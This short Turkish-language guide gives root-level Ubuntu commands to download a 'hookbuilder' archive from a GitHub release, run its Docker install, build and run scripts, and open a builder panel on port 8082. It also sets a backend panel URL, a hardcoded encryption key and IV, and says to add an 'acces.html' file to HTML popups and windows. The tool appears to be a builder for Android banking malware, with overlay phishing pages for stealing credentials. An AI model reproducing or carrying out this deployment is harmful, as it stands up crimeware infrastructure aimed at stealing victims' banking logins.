"Ubuntu 20.04 - 8082 portunu açın"

sudo su

cd /var

apt-get update -y

apt-get upgrade -y

apt-get install wget -y

apt-get install unzip -y

wget "https://github.com/rastgeleartikyeter/files/releases/download/asdasdasd/hookbuilder.zip"

unzip hookbuilder.zip

rm -rv hookbuilder.zip

cd www

chmod 777 *

./install_docker.sh

./docker_build.sh - 2 kere çalıştır

./run_docker.sh

Sunucu ip adresi:8082 - builder giriş

URL backend connect: http://panel:3434

Backend encryption key: 1A1zP1eP5QGefi2DMPTfTL5SLmv7Divf

InitialVector: 0123456789abcdef

geri kalanları rastgele yazın

aşağıdaki seçenekleri değiştirmeyin yoksa build etmiyor

acces.html < html popup ve html window'a ekleyin